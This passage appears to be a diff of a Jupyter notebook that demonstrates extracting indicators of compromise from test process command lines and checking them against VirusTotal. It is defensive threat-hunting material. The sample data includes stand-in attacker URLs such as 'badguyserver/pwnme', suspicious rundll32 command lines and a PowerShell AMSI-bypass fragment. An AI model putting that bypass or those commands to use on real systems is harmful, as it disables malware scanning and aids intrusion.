+       "2                 cmd  /c \"systeminfo && systeminfo\"\n",
+       "3                           .\\rundll32  /C 42424.exe\n",
+       "4       .\\rundll32  /C c:\\users\\MSTICAdmin\\42424.exe"
+      ]
+     },
+     "execution_count": 3,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Load test data\n",
+    "process_tree = pd.read_csv('data/process_tree.csv')\n",
+    "process_tree[['CommandLine']].head()"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 8,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>IoCType</th>\n",
+       "      <th>Observable</th>\n",
+       "      <th>SourceIndex</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>tsetup.1.exe</td>\n",
+       "      <td>9</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>tsetup.1.0.14.exe</td>\n",
+       "      <td>9</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>tsetup.1.0.14.tmp</td>\n",
+       "      <td>9</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>doubleextension.pdf.exe</td>\n",
+       "      <td>20</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>url</td>\n",
+       "      <td>http://server/file.sct</td>\n",
+       "      <td>31</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>5</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>server</td>\n",
+       "      <td>31</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>6</th>\n",
+       "      <td>url</td>\n",
+       "      <td>http://somedomain/best-kitten-names-1.jpg'</td>\n",
+       "      <td>37</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>7</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>somedomain</td>\n",
+       "      <td>37</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>8</th>\n",
+       "      <td>md5_hash</td>\n",
+       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
+       "      <td>40</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>9</th>\n",
+       "      <td>md5_hash</td>\n",
+       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
+       "      <td>41</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>10</th>\n",
+       "      <td>md5_hash</td>\n",
+       "      <td>81ed03caf6901e444c72ac67d192fb9c</td>\n",
+       "      <td>44</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>11</th>\n",
+       "      <td>url</td>\n",
+       "      <td>http://badguyserver/pwnme\"</td>\n",
+       "      <td>46</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>12</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>badguyserver</td>\n",
+       "      <td>46</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>13</th>\n",
+       "      <td>url</td>\n",
+       "      <td>http://badguyserver/pwnme\"</td>\n",
+       "      <td>47</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>14</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>badguyserver</td>\n",
+       "      <td>47</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>15</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>system.management.automation.amsiutils').getfi...</td>\n",
+       "      <td>77</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>16</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>system.management.automation.amsiutils</td>\n",
+       "      <td>77</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>17</th>\n",
+       "      <td>url</td>\n",
+       "      <td>http://system.management.automation.amsiutils'...</td>\n",
+       "      <td>77</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>18</th>\n",
+       "      <td>ipv4</td>\n",
+       "      <td>1.2.3.4</td>\n",
+       "      <td>78</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>19</th>\n",
+       "      <td>ipv4</td>\n",
+       "      <td>127.0.0.1</td>\n",
+       "      <td>102</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>20</th>\n",
+       "      <td>url</td>\n",
+       "      <td>http://127.0.0.1/</td>\n",
+       "      <td>102</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "     IoCType                                         Observable SourceIndex\n",
+       "0        dns                                       tsetup.1.exe           9\n",
+       "1        dns                                  tsetup.1.0.14.exe           9\n",
+       "2        dns                                  tsetup.1.0.14.tmp           9\n",
+       "3        dns                            doubleextension.pdf.exe          20\n",
+       "4        url                             http://server/file.sct          31\n",
+       "5        dns                                             server          31\n",
+       "6        url         http://somedomain/best-kitten-names-1.jpg'          37\n",
+       "7        dns                                         somedomain          37\n",
+       "8   md5_hash                  aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa           40\n",
+       "9   md5_hash                  aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa           41\n",
+       "10  md5_hash                   81ed03caf6901e444c72ac67d192fb9c          44\n",
+       "11       url                         http://badguyserver/pwnme\"          46\n",
+       "12       dns                                       badguyserver          46\n",
+       "13       url                         http://badguyserver/pwnme\"          47\n",
+       "14       dns                                       badguyserver          47\n",
+       "15       dns  system.management.automation.amsiutils').getfi...          77\n",
+       "16       dns             system.management.automation.amsiutils          77\n",
+       "17       url  http://system.management.automation.amsiutils'...          77\n",
+       "18      ipv4                                            1.2.3.4          78\n",
+       "19      ipv4                                          127.0.0.1         102\n",
+       "20       url                                  http://127.0.0.1/         102"
+      ]
+     },
+     "execution_count": 8,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Use our Regex IoC extractor to pull out things that look like IoCs from the Commandline\n",
+    "ioc_extractor = IoCExtract()\n",
+    "vt_lookup = VTLookup(vt_key.value, verbosity=2)\n",
+    "output_df = ioc_extractor.extract(data=process_tree, \n",
+    "                                  columns=['CommandLine'], \n",
+    "                                  ioc_types=vt_lookup.supported_ioc_types)\n",
+    "output_df"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Submit these to VirusTotal\n",
+    "Note that most of these the IoC observables found by a simple regex extraction were rejected before submitting to VT. As well as checking for duplicates this module also filters out things like \n",
+    "- loopback/private IPs\n",
+    "- unqualified and unresolvable domain names\n",
+    "- strings of hex characters that are probably not hashes "
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Submitting observables: \"1.2.3.4\", type \"ipv4\" to VT. (Source index 78)\n",
+      "Invalid observable format: \"127.0.0.1\", type \"ipv4\", status: IP is private address - skipping. (Source index 102)\n",
+      "Invalid observable format: \"tsetup.1.exe\", type \"dns\", status: Domain not resolvable - skipping. (Source index 9)\n",
+      "Invalid observable format: \"tsetup.1.0.14.exe\", type \"dns\", status: Domain not resolvable - skipping. (Source index 9)\n",
+      "Invalid observable format: \"tsetup.1.0.14.tmp\", type \"dns\", status: Domain not resolvable - skipping. (Source index 9)\n",
+      "Invalid observable format: \"doubleextension.pdf.exe\", type \"dns\", status: Domain not resolvable - skipping. (Source index 20)\n",
+      "Invalid observable format: \"server\", type \"dns\", status: Observable does not match expected pattern for dns - skipping. (Source index 31)\n",
+      "Invalid observable format: \"somedomain\", type \"dns\", status: Observable does not match expected pattern for dns - skipping. (Source index 37)\n",
+      "Invalid observable format: \"badguyserver\", type \"dns\", status: Observable does not match expected pattern for dns - skipping. (Source index 46)\n",
+      "Invalid observable format: \"badguyserver\", type \"dns\", status: Observable does not match expected pattern for dns - skipping. (Source index 47)\n",
+      "Invalid observable format: \"system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue($null,$true)\", type \"dns\", status: Observable does not match expected pattern for dns - skipping. (Source index 77)\n",
+      "Invalid observable format: \"system.management.automation.amsiutils\", type \"dns\", status: Domain not resolvable - skipping. (Source index 77)\n",
+      "Invalid observable format: \"http://server/file.sct\", type \"url\", status: Host is unqualified domain name - skipping. (Source index 31)\n",
+      "Invalid observable format: \"http://somedomain/best-kitten-names-1.jpg'\", type \"url\", status: Host is unqualified domain name - skipping. (Source index 37)\n",
+      "Invalid observable format: \"http://badguyserver/pwnme\"\", type \"url\", status: Host is unqualified domain name - skipping. (Source index 46)\n",
+      "Invalid observable format: \"http://badguyserver/pwnme\"\", type \"url\", status: Host is unqualified domain name - skipping. (Source index 47)\n",
+      "Submitting observables: \"http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue($null,$true)\", type \"url\" to VT. (Source index 77)\n",
+      "Invalid observable format: \"http://127.0.0.1/\", type \"url\", status: Host part of URL is a private IP address - skipping. (Source index 102)\n",
+      "Invalid observable format: \" aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \", type \"md5_hash\", status: String has too low an entropy to be a hash - skipping. (Source index 40)\n",
+      "Invalid observable format: \" aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \", type \"md5_hash\", status: String has too low an entropy to be a hash - skipping. (Source index 41)\n",
+      "Submitting observables: \"81ed03caf6901e444c72ac67d192fb9c\", type \"md5_hash\" to VT. (Source index 44)\n",
+      "Submission complete. 21 responses from 21 input rows\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>Observable</th>\n",
+       "      <th>IoCType</th>\n",
+       "      <th>Status</th>\n",
+       "      <th>ResponseCode</th>\n",
+       "      <th>RawResponse</th>\n",
+       "      <th>Resource</th>\n",
+       "      <th>SourceIndex</th>\n",
+       "      <th>VerboseMsg</th>\n",
+       "      <th>Resource</th>\n",
+       "      <th>ScanId</th>\n",
+       "      <th>Permalink</th>\n",
+       "      <th>Positives</th>\n",
+       "      <th>MD5</th>\n",
+       "      <th>SHA1</th>\n",
+       "      <th>SHA256</th>\n",
+       "      <th>ResolvedDomains</th>\n",
+       "      <th>ResolvedIPs</th>\n",
+       "      <th>DetectedUrls</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>1.2.3.4</td>\n",
+       "      <td>ipv4</td>\n",
+       "      <td>Success</td>\n",
+       "      <td>1</td>\n",
+       "      <td>{\"asn\": \"15169\", \"undetected_referrer_samples\"...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>78</td>\n",
+       "      <td>IP address in dataset</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>162</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>%2a.netaccess-india.com, 0-9.dgjtest030-pp-qm-...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>http://1.2.3.4:8347/, http://1.2.3.4/, http://...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>127.0.0.1</td>\n",
+       "      <td>ipv4</td>\n",
+       "      <td>IP is private address</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>102</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>tsetup.1.exe</td>\n",
+       "      <td>dns</td>\n",
+       "      <td>Domain not resolvable</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>9</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>tsetup.1.0.14.exe</td>\n",
+       "      <td>dns</td>\n",
+       "      <td>Domain not resolvable</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>9</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>tsetup.1.0.14.tmp</td>\n",
+       "      <td>dns</td>\n",
+       "      <td>Domain not resolvable</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>9</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>5</th>\n",
+       "      <td>doubleextension.pdf.exe</td>\n",
+       "      <td>dns</td>\n",
+       "      <td>Domain not resolvable</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>20</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>6</th>\n",
+       "      <td>server</td>\n",
+       "      <td>dns</td>\n",
+       "      <td>Observable does not match expected pattern for...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>31</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>7</th>\n",
+       "      <td>somedomain</td>\n",
+       "      <td>dns</td>\n",
+       "      <td>Observable does not match expected pattern for...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>37</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>8</th>\n",
+       "      <td>badguyserver</td>\n",
+       "      <td>dns</td>\n",
+       "      <td>Observable does not match expected pattern for...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>46</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>9</th>\n",
+       "      <td>badguyserver</td>\n",
+       "      <td>dns</td>\n",
+       "      <td>Observable does not match expected pattern for...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>47</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>10</th>\n",
+       "      <td>system.management.automation.amsiutils').getfi...</td>\n",
+       "      <td>dns</td>\n",
+       "      <td>Observable does not match expected pattern for...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>77</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>11</th>\n",
+       "      <td>system.management.automation.amsiutils</td>\n",
+       "      <td>dns</td>\n",
+       "      <td>Domain not resolvable</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>77</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>12</th>\n",
+       "      <td>http://server/file.sct</td>\n",
+       "      <td>url</td>\n",
+       "      <td>Host is unqualified domain name</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>31</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>13</th>\n",
+       "      <td>http://somedomain/best-kitten-names-1.jpg'</td>\n",
+       "      <td>url</td>\n",
+       "      <td>Host is unqualified domain name</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>37</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>14</th>\n",
+       "      <td>http://badguyserver/pwnme\"</td>\n",
+       "      <td>url</td>\n",
+       "      <td>Host is unqualified domain name</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>46</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>15</th>\n",
+       "      <td>http://badguyserver/pwnme\"</td>\n",
+       "      <td>url</td>\n",
+       "      <td>Host is unqualified domain name</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>47</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>16</th>\n",
+       "      <td>http://system.management.automation.amsiutils'...</td>\n",
+       "      <td>url</td>\n",
+       "      <td>Success</td>\n",
+       "      <td>0</td>\n",
+       "      <td>{\"response_code\": 0, \"resource\": \"http://syste...</td>\n",
+       "      <td>http://system.management.automation.amsiutils'...</td>\n",
+       "      <td>77</td>\n",
+       "      <td>Resource does not exist in the dataset</td>\n",
+       "      <td>http://system.management.automation.amsiutils'...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>17</th>\n",
+       "      <td>http://127.0.0.1/</td>\n",
+       "      <td>url</td>\n",
+       "      <td>Host part of URL is a private IP address</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>102</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>18</th>\n",
+       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
+       "      <td>md5_hash</td>\n",
+       "      <td>String has too low an entropy to be a hash</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>40</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>19</th>\n",
+       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
+       "      <td>md5_hash</td>\n",
+       "      <td>String has too low an entropy to be a hash</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>41</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>20</th>\n",
+       "      <td>81ed03caf6901e444c72ac67d192fb9c</td>\n",
+       "      <td>md5_hash</td>\n",
+       "      <td>Success</td>\n",
+       "      <td>0</td>\n",
+       "      <td>{\"response_code\": 0, \"resource\": \"81ed03caf690...</td>\n",
+       "      <td>81ed03caf6901e444c72ac67d192fb9c</td>\n",
+       "      <td>44</td>\n",
+       "      <td>The requested resource is not among the finish...</td>\n",
+       "      <td>81ed03caf6901e444c72ac67d192fb9c</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                           Observable   IoCType  \\\n",
+       "0                                             1.2.3.4      ipv4   \n",
+       "1                                           127.0.0.1      ipv4   \n",
+       "2                                        tsetup.1.exe       dns   \n",
+       "3                                   tsetup.1.0.14.exe       dns   \n",
+       "4                                   tsetup.1.0.14.tmp       dns   \n",
+       "5                             doubleextension.pdf.exe       dns   \n",
+       "6                                              server       dns   \n",
+       "7                                          somedomain       dns   \n",
+       "8                                        badguyserver       dns   \n",
+       "9                                        badguyserver       dns   \n",
+       "10  system.management.automation.amsiutils').getfi...       dns   \n",
+       "11             system.management.automation.amsiutils       dns   \n",
+       "12                             http://server/file.sct       url   \n",
+       "13         http://somedomain/best-kitten-names-1.jpg'       url   \n",
+       "14                         http://badguyserver/pwnme\"       url   \n",
+       "15                         http://badguyserver/pwnme\"       url   \n",
+       "16  http://system.management.automation.amsiutils'...       url   \n",
+       "17                                  http://127.0.0.1/       url   \n",
+       "18                  aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa   md5_hash   \n",
+       "19                  aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa   md5_hash   \n",
+       "20                   81ed03caf6901e444c72ac67d192fb9c  md5_hash   \n",
+       "\n",
+       "                                               Status ResponseCode  \\\n",
+       "0                                             Success            1   \n",
+       "1                               IP is private address          NaN   \n",
+       "2                               Domain not resolvable          NaN   \n",
+       "3                               Domain not resolvable          NaN   \n",
+       "4                               Domain not resolvable          NaN   \n",
+       "5                               Domain not resolvable          NaN   \n",
+       "6   Observable does not match expected pattern for...          NaN   \n",
+       "7   Observable does not match expected pattern for...          NaN   \n",
+       "8   Observable does not match expected pattern for...          NaN   \n",
+       "9   Observable does not match expected pattern for...          NaN   \n",
+       "10  Observable does not match expected pattern for...          NaN   \n",
+       "11                              Domain not resolvable          NaN   \n",
+       "12                    Host is unqualified domain name          NaN   \n",
+       "13                    Host is unqualified domain name          NaN   \n",
+       "14                    Host is unqualified domain name          NaN   \n",
+       "15                    Host is unqualified domain name          NaN   \n",
+       "16                                            Success            0   \n",
+       "17           Host part of URL is a private IP address          NaN   \n",
+       "18         String has too low an entropy to be a hash          NaN   \n",
+       "19         String has too low an entropy to be a hash          NaN   \n",
+       "20                                            Success            0   \n",
+       "\n",
+       "                                          RawResponse  \\\n",
+       "0   {\"asn\": \"15169\", \"undetected_referrer_samples\"...   \n",
+       "1                                                 NaN   \n",
+       "2                                                 NaN   \n",
+       "3                                                 NaN   \n",
+       "4                                                 NaN   \n",
+       "5                                                 NaN   \n",
+       "6                                                 NaN   \n",
+       "7                                                 NaN   \n",
